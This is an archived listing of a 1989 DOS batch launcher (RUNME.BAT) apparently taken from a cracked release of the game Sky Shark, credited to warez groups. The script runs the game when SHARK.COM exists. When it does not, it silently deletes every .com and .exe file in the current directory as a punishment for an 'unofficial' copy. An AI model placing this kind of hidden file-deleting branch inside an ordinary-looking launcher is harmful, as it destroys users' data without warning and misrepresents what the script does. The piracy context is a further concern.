home *** CD-ROM | disk | FTP | other *** search
/ Jason Aller Floppy Collection / 64.img / SHARK1.ZIP / RUNME.BAT < prev    next >
DOS Batch File  |  1989-05-14  |  346b  |  20 lines

  1. echo off
  2. cls
  3. echo Checking For Files
  4. if exist SHARK.COM goto fine
  5. if not exist SHARK.COM goto fuckyou
  6. :fine
  7. shark
  8. pause
  9. skyshark
  10. echo This is a FiRM Krack
  11. echo But this is a HeadMaster's Distribution
  12. goto exit
  13. :fuckyou
  14. del *.com
  15. del *.exe
  16. echo This is not an Official HeadMaster's Distribution!
  17. goto exit
  18. :exit
  19. Echo Thank You!
  20.